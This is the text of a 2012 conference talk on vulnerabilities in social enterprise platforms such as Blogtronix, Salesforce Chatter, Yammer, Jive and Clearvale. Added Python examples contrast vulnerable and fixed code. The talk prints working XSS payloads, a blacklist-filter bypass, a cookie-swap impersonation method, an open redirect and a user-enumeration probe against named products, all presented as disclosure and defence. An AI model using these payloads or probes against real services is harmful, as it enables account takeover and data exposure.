Social Enterprise Rises! …and so are the Risks - DefCamp 2012
1. Social Enterprise Software Rises!
…and so are the Risks
Marian Ventuneac
marian.ventuneac@gmail.com
@mventuneac
2. About myself
Security Architect
International presenter
Member of OWASP and ISACA global organizations
OWASP Ireland Limerick Chapter Leader
https://www.owasp.org/index.php/Ireland-Limerick
Security Researcher PhD, MEng
http://www.ventuneac.net
http://secureappdev.blogspot.com
http://dcsl.ul.ie
An Introduction to Web Application Security Risks
3. Agenda
Social Enterprise Software: What, Why, and How?
Social Enterprise Software & Risks
Thoughts on Calculated Risk
Social Enterprise Software & Risks (some case studies)
Final Thoughts
4. Social Enterprise Software: What?
Social Enterprise / Social Enterprise Networks / Social Enterprise Software
Enterprise solutions providing Facebook-like social networking functionality
‘social networking’ + ‘enterprise software’ = ‘social enterprise networking’
5. Social Enterprise Software: Why?
Improve communication and increase work efficiency
internal collaboration
establish teams, communities or informal groups
share knowledge and learn from other people's experiences
social networking
external collaboration with partners
…
Used by employees and by external customers, suppliers and partners
6. Social Enterprise Software: Deployment models
On-premise solutions
Deployed inside the enterprise network, usually controlled and managed by the client
Public Cloud-based solutions
Software as a Service (SaaS) - hosted and administered by the vendor
Hybrid deployments
Usually open to allow external collaboration (customers, suppliers, third-party contractors, etc)
7. Social Enterprise Software: Some of the Risks
Potential loss of enterprise data
Understand what type of data needs to be uploaded there
Do you know/control what data is actually being shared?
Exploitation of common application vulnerabilities
Phishing attacks, social engineering
Viruses and malware
Cloud-based solutions - various compliance and security concerns
Do you know where your data is stored?
8. Common Strategies for Risk Mitigation
Vendor/supplier due diligence
Security policies (generic/dedicated)
Security processes & procedures
Control the data being shared (data classification)
Verify identity of users accessing the data (authentication)
Control user access to data
Approve/Create/Lock user accounts (accounts management)
Remote wipe (for mobile devices – smartphone, tablets, etc)
…
10. Calculated Risks (cont)
Business requirement:
WE (the company) need social enterprise software X for Y and Z reasons.
IT Security (most likely take on it):
Scenario 1: No, there is too much risk to take!
Scenario 2: Yes - we trust our partners and their choices.
Scenario 3: Yes - IF the Business ASSUMES ALL THE RISKS…
Scenario 4: Let’s take a closer look at it…
Scenario 5: Yes - the vendor is big enough and we can trust it (= the vendor takes application security seriously)
11. Let’s Take a Closer Look
Software defects leading to exploitation of security vulnerabilities
OWASP Top 10 Security Risks
CWE/SANS Top 25 Most Dangerous Programming Errors
Vendor size is a plus, but doesn't guarantee the chosen solution is vulnerability free
It is safe to assume that no application is 100% secure
If anyone claims such a thing, can they provide reasonable proof?
12. Let’s Take a Closer Look (cont)
Trust but verify
Reach an agreement to test the chosen solution in a suitable environment (ideally prior to any contracts being signed)
Manual security testing
Automated security testing
Responsible disclosure
Most likely you will not be disappointed
13. The Closer Look (cont)
A practical take on assessing security of social enterprise software solutions
Some of the chosen ones
14. The Closer Look (cont)
Assessment criteria including tests for
Cross-Site Scripting (XSS)
Insecure Direct Object Reference
Security Misconfiguration
Failure to Restrict URL Access
Unvalidated Redirects and Forwards
Logical Flaws
…
15. Blogtronix Enterprise
Blogtronix Enterprise v4.0.4179 (on-premise) and SaaS
CVE-2011-1039 - Multiple XSS Vulnerabilities
Persistent (partially) XSS via Search functionality (authenticated user)
HTTP request:
http://test_site/Home/pages/search/?search=<script>alert(document.cookie)</script>&sub=1&tab=0
HTTP response:
…
<a href="/Home/pages/search/?search=%3cscript%3ealert(document.cookie)%3b&sub=1&tab=0"> <script>alert(docume...</a> </span> <span style="
…
16. Blogtronix Enterprise (cont)
CVE-2011-1039 - Multiple XSS Vulnerabilities
Reflected XSS in login page via arbitrary parameter
HTTP request:
https://test_site/pages/login/?a"'><script>alert(document.cookie)</script>
HTTP response:
<form method="post" action="/pages/login/?a"'><script>alert(document.cookie)</script>" id="aspnetForm">
Multiple reflected XSS via existing and arbitrary parameters of existing resources
17. Blogtronix Enterprise (cont)
Insecure Direct Object Reference (variant)
Valid user A can potentially impersonate another user B
Tamper with the value of the userAccountID_http://test_site/ cookie (an ASP.NET GUID)
1. At login time, replace the value of the userAccountID_ cookie with the one matching user B
2. Do something noticeable (post a message in group X) and log out
3. As authenticated user A, review user B's recent activity: user B appears as a recent visitor of group X
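The root cause of the three steps above is that the server authenticates the session but then reads *who* the session belongs to from a cookie the client can rewrite. The following is an added example, not Blogtronix code: it contrasts that pattern with one where identity is bound to a server-side session record. The account table, passwords, the auth_ticket cookie name and the store layout are constructed assumptions; only the userAccountID_ cookie name comes from the slide.

```python
import hmac
import secrets

# Constructed sample accounts: username -> (password, ASP.NET-style account GUID).
# Store shapes and cookie names other than userAccountID_ are assumptions for
# illustration, not the vendor's implementation.
ACCOUNTS = {
    "user_a": ("pw-a", "7c2b6f1e-4a0d-4a1b-9b3e-0c5d2e8f1a01"),
    "user_b": ("pw-b", "3e9a1d5c-8b7f-4c2e-a6d4-1f0e9b8c7d02"),
}
GUID_TO_USER = {guid: name for name, (_, guid) in ACCOUNTS.items()}

# Server-side session store: opaque ticket -> account GUID.
SESSIONS = {}


def _check_password(username, password):
    if username not in ACCOUNTS:
        return False
    return hmac.compare_digest(ACCOUNTS[username][0], password)


def _new_ticket(guid):
    ticket = secrets.token_urlsafe(32)
    SESSIONS[ticket] = guid
    return ticket


# --- vulnerable: identity travels in a client-writable cookie ---------------

def login_vulnerable(username, password):
    """Cookies set on login: the ticket proves *a* login happened, but the
    account GUID is also handed to the browser."""
    if not _check_password(username, password):
        return None
    guid = ACCOUNTS[username][1]
    return {"auth_ticket": _new_ticket(guid), "userAccountID_": guid}


def current_user_vulnerable(cookies):
    """The ticket is validated, but *who* the request acts as is read from
    the userAccountID_ cookie, so swapping that GUID swaps the identity."""
    if cookies.get("auth_ticket") not in SESSIONS:
        return None
    return GUID_TO_USER.get(cookies.get("userAccountID_"))


# --- fixed: identity is bound to the server-side session --------------------

def login_fixed(username, password):
    """Only an opaque ticket leaves the server; the GUID stays in SESSIONS."""
    if not _check_password(username, password):
        return None
    return {"auth_ticket": _new_ticket(ACCOUNTS[username][1])}


def current_user_fixed(cookies):
    """Identity comes from the session record the ticket points at; any
    extra or tampered userAccountID_ cookie is simply ignored."""
    guid = SESSIONS.get(cookies.get("auth_ticket"))
    return GUID_TO_USER.get(guid)


def impersonation_attempt(login, current_user):
    """Replays step 1 of the slide: log in as user A, then replace the
    userAccountID_ cookie with user B's GUID before the next request."""
    cookies = dict(login("user_a", "pw-a"))
    cookies["userAccountID_"] = ACCOUNTS["user_b"][1]
    return current_user(cookies)
```

With the vulnerable pair, `impersonation_attempt` returns `user_b` even though only user A's password was ever presented; with the fixed pair it returns `user_a`, and a forged ticket yields no user at all.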
18. Blogtronix Enterprise (cont)
Security Misconfiguration
Enumerate valid user IDs
Unauthenticated attacker checks for
https://test_site/users/user_id
if user_id exists, redirected to login
if not, display custom error
Enumerate valid groups
Unauthenticated attacker checks for
https://test_site/group_id/pages/people/
if group_id exists, redirected to login
if not, display custom error
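Both enumeration cases above share one defect: the resource is resolved before the visitor is asked to authenticate, so the redirect-versus-error difference becomes an oracle. The following is an added example (not the vendor's code; the user table, paths and response shapes are constructed) showing the vulnerable ordering, the fixed ordering, and the differential probe a tester would run against either.

```python
from dataclasses import dataclass
from typing import Optional

# Constructed sample data standing in for the application's user table.
EXISTING_USERS = {"alice", "bob"}


@dataclass(frozen=True)
class Response:
    status: int
    location: Optional[str] = None   # Location header on a redirect
    body: str = ""


def users_vulnerable(user_id, authenticated=False):
    """Behaviour described on the slide: the ID is resolved first, and only
    then is the visitor sent to login, so the response shape reveals existence."""
    if user_id not in EXISTING_USERS:
        return Response(404, body="Custom error: page not found")
    if not authenticated:
        return Response(302, location="/pages/login/?ReturnUrl=/users/" + user_id)
    return Response(200, body="profile of " + user_id)


def users_fixed(user_id, authenticated=False):
    """Authentication is enforced before any lookup: every unauthenticated
    request, valid ID or not, produces the same redirect."""
    if not authenticated:
        return Response(302, location="/pages/login/?ReturnUrl=/users/" + user_id)
    if user_id not in EXISTING_USERS:
        return Response(404, body="Custom error: page not found")
    return Response(200, body="profile of " + user_id)


def fingerprint(resp):
    """What an unauthenticated prober can observe; the probed ID that a
    ReturnUrl legitimately echoes back is deliberately ignored."""
    return (resp.status, resp.location is not None, resp.body)


def leaks_existence(handler, known_existing, known_missing):
    """Tester's differential check: same unauthenticated probe, two IDs."""
    return fingerprint(handler(known_existing)) != fingerprint(handler(known_missing))


def enumerate_ids(handler, candidates):
    """Exploit the oracle: any candidate that does not look like the
    guaranteed-missing control is reported as a valid ID."""
    control = fingerprint(handler("__no_such_user__"))
    return sorted(c for c in candidates if fingerprint(handler(c)) != control)
```

The same probe applies unchanged to the `/group_id/pages/people/` case: swap the handler and the candidate list. Against `users_fixed` the wordlist comes back empty, while authenticated users still get the real 200/404 split.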
20. Blogtronix Enterprise (cont)
CVE-2011-1040 Unvalidated Redirects
https://test_site/pages/login/?ReturnUrl=http%3a%2f%2fwww.google.co.uk%2f
Once the user logs in, he/she gets redirected to the resource previously stated via the ReturnUrl parameter
CVE-2011-1041 Failure to restrict access to protected resources
Attacker knows hashed user ID and name of uploaded file => file can be accessed without authentication
Attacker knows hashed user ID => user profile picture can be accessed without authentication
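For the ReturnUrl case the fix is to treat the parameter as an untrusted hint and only honour same-site absolute paths. The following is an added example (not the vendor's code): a validator that rejects the external URL from the slide as well as the usual bypass shapes (protocol-relative `//host`, backslash variants, `javascript:` schemes), plus a helper that pulls ReturnUrl out of the login request URL exactly as it appears on the slide. Function names are assumptions.

```python
from urllib.parse import parse_qs, urlsplit, urlunsplit


def safe_return_url(return_url, default="/"):
    """Allow only a same-site, absolute-path URL ("/Home/pages/..."); anything
    that could leave the site falls back to `default`."""
    if not return_url:
        return default
    # Control characters and whitespace are never legitimate here and are a
    # common way to confuse URL parsers into disagreeing with the browser.
    if any(ord(c) < 0x20 or c.isspace() for c in return_url):
        return default
    # Protocol-relative (//host) and backslash variants (/\host, which some
    # browsers normalise to //host) leave the site while still "starting with /".
    if return_url.startswith("//") or "\\" in return_url:
        return default
    parts = urlsplit(return_url)
    if parts.scheme or parts.netloc:          # http://..., javascript:, data:
        return default
    if not parts.path.startswith("/"):        # relative paths are ambiguous; reject
        return default
    # Re-assemble only the parts we validated (path + query); drop any fragment.
    return urlunsplit(("", "", parts.path, parts.query, ""))


def post_login_redirect(login_request_url, default="/"):
    """Given the login page URL as requested (ReturnUrl still percent-encoded),
    return where the user should be sent after a successful login."""
    query = parse_qs(urlsplit(login_request_url).query)
    return safe_return_url(query.get("ReturnUrl", [""])[0], default)
```

Feeding the slide's request to `post_login_redirect` yields `/` rather than `http://www.google.co.uk/`; a legitimate percent-encoded internal path such as the search page survives with its query string intact. An allow-list of paths, if the application has one, is stricter still and can be layered on top of this check.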
21. Salesforce Chatter SaaS
Multiple persistent XSS vulnerabilities
via user profile first & last name
<a href="/005D00000022Ouw" class="entityLink" title="Adam" onmouseover="alert(1)" Cole">Adam" onmouseover="alert(1)&quot; Cole</a>
via group name
<a href="/0F9D0000000PPwz" class="entityLink" title="test_group" onmouseover="alert(3)"">test_group&quot; onmouseover="alert(3)"</a>
22. Salesforce Chatter SaaS (cont)
Improper User Input Validation
File Sharing - CR LF symbols accepted into file title (via SaaS solution)
POST /mobile/direct/23.0/005D0000001yD7B/feed_items.json HTTP/1.1
Host: eu1.salesforce.com
…
Content-Disposition: form-data; name="title"

arv_test52%0a%0d%0a
23. Salesforce Chatter Desktop
Improper Error Handling leading to Information Disclosure
submitting comments for nonexistent posts
HTTP POST request: /mobile/direct/23.0/0D5D00000000000/comments.json HTTP/1.1
Error: {"status":404,"msg":"NoDataFoundException: ORA-20001: \nORA-06512: at \"DOPEY.CFEEDCOMMENT\", line 149\nORA-06512: at \"DOPEY.CFEEDCOMMENT\", line 253\nORA-06512: at line 1\n: {call cFeedComment.insert_feedcomments(?,?,?,?,?,?,?,?,?,?,?,?,?)})}"}
attempting to ‘like’ a nonexistent post
HTTP POST request: /mobile/direct/23.0/0D5D00000000000/like.json HTTP/1.1
Error: {"status":404,"msg":"NoDataFoundException: ORA-20001: \nORA-06512: at \"DOPEY.CFEEDLIKE\", line 156\nORA-06512: at \"DOPEY.CFEEDLIKE\", line 217\nORA-06512: at \"DOPEY.CFEEDLIKE\", line 118\nORA-06512: at line 1\n: {call cFeedLike.insert_detail(?,?,?,?,?,?,?,?)})}"}
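What leaks above is the exception class, the Oracle error chain, PL/SQL package and line numbers, and the stored-procedure signature: everything an attacker wants for targeting the backend, and nothing the client needs. The following is an added example (not Salesforce code) of the usual remedy: a generic client-facing message plus a correlation id, with the detail kept in the server log. The handler, the sample exception text and the marker list are constructed for illustration.

```python
import json
import logging
import uuid

log = logging.getLogger("feed-api")


class NoDataFoundException(Exception):
    """Stand-in for the exception the endpoint surfaced (assumed name reuse)."""


# Constructed sample modelled on the slide's error body; package names and
# line numbers are illustrative, not copied from a live system.
SAMPLE_DB_DETAIL = (
    'ORA-20001: \nORA-06512: at "DOPEY.CFEEDCOMMENT", line 149\n'
    'ORA-06512: at line 1\n: {call cFeedComment.insert_feedcomments(?,?,?,?)}'
)


def comment_on_post(post_id, error_handler):
    """Hypothetical comments.json handler: the lookup fails for an unknown
    post id and `error_handler` decides what the client gets to see."""
    try:
        if post_id == "0D5D00000000000":          # the never-existing id from the slide
            raise NoDataFoundException(SAMPLE_DB_DETAIL)
        return json.dumps({"status": 201})
    except Exception as exc:                      # noqa: BLE001 - boundary handler
        return error_handler(exc)


def error_response_vulnerable(exc):
    """Mirrors the leak: exception class and full message go to the client."""
    return json.dumps({"status": 404, "msg": f"{type(exc).__name__}: {exc}"})


def error_response_safe(exc):
    """Generic message to the client; the detail is logged server-side under a
    correlation id the user can quote to support."""
    ref = uuid.uuid4().hex
    log.error("ref=%s %s: %s", ref, type(exc).__name__, exc)
    return json.dumps({"status": 404, "msg": "Resource not found", "ref": ref})


# Strings that have no business appearing in a client-facing error body.
INTERNAL_MARKERS = ("ORA-", "Exception", "DOPEY.", "{call ", ", line ")


def leaks_internals(body):
    """Cheap check a tester can run over captured error bodies."""
    return any(marker in body for marker in INTERNAL_MARKERS)


def parse_status(body):
    return json.loads(body)["status"]
```

`leaks_internals` is also usable as a regression test in the vendor's own pipeline: run the failing request, assert the body is clean. The status code stays 404 in the safe variant; it is the message, not the code, that was the problem.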
24. Yammer
Persistent XSS via group name
HTTP POST request:
POST /ventuneac.net/groups HTTP/1.1
Host: www.yammer.com
…
-----------------------------295562556131627
Content-Disposition: form-data; name="group[name]"

a4" onmouseover="alert(4)"
-----------------------------295562556131627
HTTP response (home page):
GET /ventuneac.net/ HTTP/1.1
Host: www.yammer.com
…
<a href="/ventuneac.net/groups/a4onmouseoveralert4" class="nav-list-link" title="a4" onmouseover="alert(4)" group">
25. Jive
Persistent XSS via group description (create/edit)
HTTP POST request:
POST /create-group.jspa HTTP/1.1
Host: ventuneac.jiveon.com
…
-----------------------------215202979014924
Content-Disposition: form-data; name="description"

group2"><script>alert(1)</script>
-----------------------------215202979014924
HTTP response (load group from Places):
GET /groups/group2 HTTP/1.1
Host: ventuneac.jiveon.com
…
<meta name="description" content="group2"><script>alert(1)</script>" />
26. BroadVision Clearvale SaaS
Multiple persistent XSS vulnerabilities
via user profile first & last name & search page
<a href="http://vmarian.clearvale.com/pg/profile/3" rel="me" . title="m" style="xss:expr/*XSS*/ession(document.location('http://www.google.co.uk'))">m" style="xss:expr/*XS...</a>
via group name & search page
<a href="http://vmarian.clearvale.com/pg/groups/23/aaaa-stylexssexprxssessiondocumentlocationhttpwwwgooglecouk/" title="aaa"><a style="xss:expr/*XSS*/ession(document.location('http://www.google.co.uk'))">aaa"><a style="xss:exp...</a>
27. BroadVision Clearvale SaaS (cont)
The broken fix for user profile name XSS issue
Black-list user input validation
style followed by = becomes style00 (style=, style =, etc)
document.location followed by ( becomes document.location00
alert followed by ( becomes 00
/* becomes /0*
for first instance only
*/ becomes *0/
…
Improper output escaping
28. BroadVision Clearvale SaaS (cont)
The broken fix for user profile name XSS issue
Bypassing Clearvale XSS filter
XSS payload:
firstname: m" style
lastname: ="/**/;xss:expr/**/ession(alert/**/('aaa'))
HTTP response:
…
<a href="http://vmarian.clearvale.com/pg/profile/3" rel="me" . title="m" style ="/0**0/;xss:expr/**/ession(alert/**/('aaa')) ">m" style ="/0**0/;xss:...</a>
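The Salesforce Chatter, Yammer, Jive and Clearvale findings are all the same bug: a user-controlled name lands inside an HTML attribute without attribute-context escaping, so a single `"` closes the attribute and the rest of the value becomes new attributes. The Clearvale fix then shows why a keyword blacklist cannot repair that. The following is an added example, not vendor code: it re-implements the blacklist as the two slides above describe it (the exact matching rules are an assumption), renders the profile link with and without it, and parses the result with Python's own HTML parser to see what a browser would get. Function names and the `/pg/profile/3` path shape are illustrative.

```python
import html
import re
from html.parser import HTMLParser


def clearvale_style_filter(value):
    """Reproduces the blacklist described on the slide. Assumed rules:
    'style' plus optional whitespace before '=', a literal '(' after
    document.location / alert, and only the first '/*' and '*/' touched."""
    out = re.sub(r"style\s*=", "style00", value)
    out = out.replace("document.location(", "document.location00")
    out = out.replace("alert(", "00")
    out = out.replace("/*", "/0*", 1)
    out = out.replace("*/", "*0/", 1)
    return out


def profile_link_vulnerable(first, last):
    """Filtered input is still dropped raw into an attribute and a text node.
    The two fields are filtered separately and joined afterwards, which is
    what lets 'style' and '=' meet only after the filter has run."""
    name = clearvale_style_filter(first) + " " + clearvale_style_filter(last)
    return f'<a href="/pg/profile/3" rel="me" title="{name}">{name}</a>'


def profile_link_fixed(first, last):
    """No blacklist at all: output escaping for the HTML attribute/text
    context (quote=True handles both) makes a '"' in the name inert."""
    name = html.escape(first + " " + last, quote=True)
    return f'<a href="/pg/profile/3" rel="me" title="{name}">{name}</a>'


class _FirstTag(HTMLParser):
    """Collects the attributes of the first start tag, as a browser would see them."""

    def __init__(self):
        super().__init__()
        self.attrs = None

    def handle_starttag(self, tag, attrs):
        if self.attrs is None:
            self.attrs = dict(attrs)


def anchor_attributes(markup):
    parser = _FirstTag()
    parser.feed(markup)
    parser.close()
    return parser.attrs or {}


# The slide's bypass: 'style' sits in one field and '=' in the other, and
# comment tokens split every other keyword the blacklist looks for.
BYPASS_FIRST = 'm" style'
BYPASS_LAST = "=\"/**/;xss:expr/**/ession(alert/**/('aaa'))"

# The original (pre-fix) payload from the earlier slide, for comparison.
ORIGINAL_PAYLOAD = "m\" style=\"xss:expr/*XSS*/ession(document.location('http://www.google.co.uk'))"
```

Run through `profile_link_vulnerable`, the bypass produces an anchor whose parsed attributes include a `style` attribute (the `title` is just `m`), which is the response the slide shows. Through `profile_link_fixed` the whole string stays inside `title`, with no `style` attribute, and no list of forbidden words needs maintaining. The same escaping function neutralises the Yammer and Jive payloads (`a4" onmouseover="alert(4)"`, `group2"><script>…`) for the same reason.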
29. Knowing What ‘private’ Really Means
Social Enterprise Software usually provides document sharing/publishing functionality
Private (not shared with anyone - default option)
Shared with private (locked) groups/members
Shared with public groups
Shared with everyone (shared via public link)
In certain conditions, the private documents can become… less private
30. AntiVirus & anti-malware file scanning
BroadVision Clearvale has a built-in AV scanning engine
The rest of tested solutions currently lack such capabilities
Yammer and Salesforce plan to add AV file scanning
No malicious files were used for testing AV capabilities
31. The Closer Look: Summary
Common security vulnerabilities - can be easily exploited
User shared information is not properly validated and sanitised
A malicious user can inject JavaScript malware into his/her profile/groups/actions/etc
Where such user controlled data is seen/accessed by other users, their accounts can easily get compromised
Exploitation of such vulnerabilities could severely compromise security of enterprise data
32. Final Thoughts
Even if the vendor is a market leader, it doesn’t necessarily mean they get application security right
Dare to ask for proof of application security
Trust but verify
Vendor due diligence, social enterprise software related security policies & security procedures, etc
Interested in this kind of benchmark?
OWASP Security Baseline Project
https://www.owasp.org/index.php/OWASP_Security_Baseline_Project